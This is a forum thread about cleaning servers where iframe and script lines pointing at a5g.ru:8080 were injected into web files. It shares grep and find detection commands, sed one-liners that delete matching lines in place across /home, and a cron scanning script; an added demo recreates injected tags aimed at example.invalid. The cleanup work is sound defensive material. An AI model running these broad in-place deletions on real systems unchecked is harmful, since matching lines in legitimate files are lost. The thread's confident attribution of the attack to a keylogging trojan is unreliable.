Server Hacked ..!
Server hacked.
HTML and PHP files have inserted code. Quote:
find * | xargs grep 'http://a5g.ru:8080'
Please help ...
Quote:
grep -r --color a5g.ru *
__________________
JaguarPC
How to remove iframe
Hi,
Please use the following script:
find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5g.ru" {} \; -exec sed -i '/a5g\.ru/d' {} \;
The above command will remove the line which contains the word "a5g.ru". The command will search all the files under /home. We are advising you to take necessary backups before running the above script.
Nelesh:
Be advised that this particular hack is NOT a server compromise but rather an infected client. You should contact whoever owns the account where the index files have been modified and let them know that their home computer is infected with a pretty dangerous trojan that records the keystrokes on their computer and captures their passwords so that hackers in China can access their hosting and (bad news) bank accounts. They have been compromised for sure if someone has already logged into their web hosting account and updated the index files, and they need to update their virus scanner with the latest updates, perform a full system scan, and also get a "good" spyware detection program such as Spyware Doctor from PCTools.

A note to logicsupport: The cleanup script is a nice idea, but I would search for the proxy port (:8080) instead of the URL, as it is not likely to show up in regular home pages and thus far has stayed consistent in hacked files on various servers while the URL link frequently changes.

Script for a cronjob for general detection of this:
Code:
#!/bin/bash
# Newline is the only field separator, so file names containing spaces
# survive the read loops below
IFS=$'\n'
# Change to your administrator email address
ALERT="root"
# Location of Log file
HLOG="/var/log/china-hack.log"
# Location of temporary test report
TLIST="/tmp/hack-test.$$"
# --------------------------------------------------
# Begin main China Hack Detection Script
# --------------------------------------------------
if [ -f ~/.bashrc ]; then
    . ~/.bashrc
fi
# User specific environment for cron job
# (the current directory is deliberately not on PATH: a root cron job
# must never execute binaries dropped into /home)
typeset -i TCOUNT=0
PATH=$PATH:$HOME/bin
export PATH
cd /home || exit 1
rm -f "${TLIST}"
# Collect index files changed in the last 30 days; the parentheses are
# required so that -type f and -mtime apply to all three names
ls /var/cpanel/users | while read -r MUSER; do
    [ -d "./${MUSER}/public_html" ] || continue
    find "./${MUSER}/public_html" -type f -mtime -30 \
        \( -name 'index.php' -o -name 'index.html' -o -name 'index.htm' \) >> "${TLIST}"
done
[ -f "${TLIST}" ] || exit 0
while read -r HFILE; do
    TCOUNT=$(grep -c ':8080' "${HFILE}")
    if [ "${TCOUNT}" -gt 0 ]; then
        # Keep a .hack backup of the original before deleting the injected lines
        sed -i'.hack' '/:8080/d' "${HFILE}"
        echo "$(date) ${HFILE}" >> "${HLOG}"
        echo "${TCOUNT} ${HFILE}"
        # Double quotes here: single quotes would mail the literal string ${ALERT}
        echo "Potential China hack found in ${HFILE}" | mail -s "Alert: Potential China Hack Detected" "${ALERT}"
    fi
    TCOUNT=0
done < "${TLIST}"
rm -f "${TLIST}"
#End of Script
__________________
My Server Expert: Server support, security, and management! Last edited by Spiral; 07-10-2009 at 06:03 PM.
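An added example, not from the thread or any of its posters, that combines the detection and line-removal commands discussed in this thread into one small POSIX sh script with a backup copy and an audit log. The directory tree, the ':8080' marker and the host example.invalid are all constructed here so the script runs offline.

```shell
#!/bin/sh
# Added example (not from the thread). MARKER is the proxy-port string the
# thread suggests matching on; the demo tree below is constructed.
MARKER=':8080'

# Print the web files under $1 that contain MARKER, one per line. The
# parentheses group the -name tests so -type f applies to all of them.
find_infected() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' -o -name '*.cgi' \) \
        -exec grep -l -F -- "$MARKER" {} \; 2>/dev/null
}

# Strip every line containing MARKER from file $1, keeping the original as
# $1.hack and appending a timestamped audit line to the log file $2.
clean_file() {
    cp -p "$1" "$1.hack" || return 1
    grep -v -F -- "$MARKER" "$1.hack" > "$1" || :   # grep exits 1 if nothing remained; that is fine
    printf '%s %s\n' "$(date +%FT%T)" "$1" >> "$2"
}

# Build a constructed demo tree: two injected index files, one clean page and
# a .txt file that must be ignored even though it contains the marker.
make_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/user1/public_html" "$d/user2/public_html"
    printf '<html>\n<iframe src="http://example.invalid:8080/x"></iframe>\n</html>\n' \
        > "$d/user1/public_html/index.html"
    printf '<?php echo "ok"; ?>\n<script src="http://example.invalid:8080/a.js"></script>\n' \
        > "$d/user2/public_html/index.php"
    printf '<html>clean</html>\n' > "$d/user2/public_html/about.html"
    printf 'notes :8080\n' > "$d/user2/public_html/readme.txt"
    echo "$d"
}

# Detect under $1, clean each hit, and print the number of files cleaned.
run_demo() {
    log="$1/hack.log"
    : > "$log"
    find_infected "$1" | while IFS= read -r f; do
        clean_file "$f" "$log"
    done
    wc -l < "$log" | tr -d ' '
}

# Stand-alone use: build the demo tree and report how many files were cleaned
[ -n "${NO_DEMO:-}" ] || run_demo "$(make_demo)"
```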
Just for some clarification .....
I have worked on this problem for the past 3 days, with only one account hacked on the server.
The problem has expanded to [A5H.ru] as well. Search your servers for anything :8080 inside all files. Linux command:
find /home/ \( -name "*.cgi" -o -name "*.php" -o -name "*.html" \) -print0 | xargs -0 egrep -l 'ru:8080' >> /root/a5g_report &
This will find anything placed into php, cgi and html files with this particular problem, looking for ru:8080. It will then place the filename of any infected files into /root/a5g_report. Now is the time to keep effective backups of your website, guys. Also do change the ftp password, but do not do it on a machine that may be infected; I changed my user's password and then gave it to the hackers again. Typical.
Detect and clean scripts
Greetings,
Last September, my server was hacked. At that time it was not only one account but several. I made some php scripts to run in sh to detect and clean the files. You can download them at www.maquinadigital.pt/scripts.tar.gz. Hope they can help someone. Best regards, daniel
Hey,
I had a similar problem a while ago and used the ossec tool (open source) to find all offending packages. It has a nice rootkit/worm/exploit detection tool in there.... After that, I kept that running with Snort and modsecurity (all open source) to monitor my systems. I lately also found sucuri to remotely check if my sites have been defaced, blacklisted, etc.
Links:
Welcome to the Home of OSSEC
ModSecurity: Open Source Web Application Firewall
Snort :: Home Page
Sucuri information security (BETA)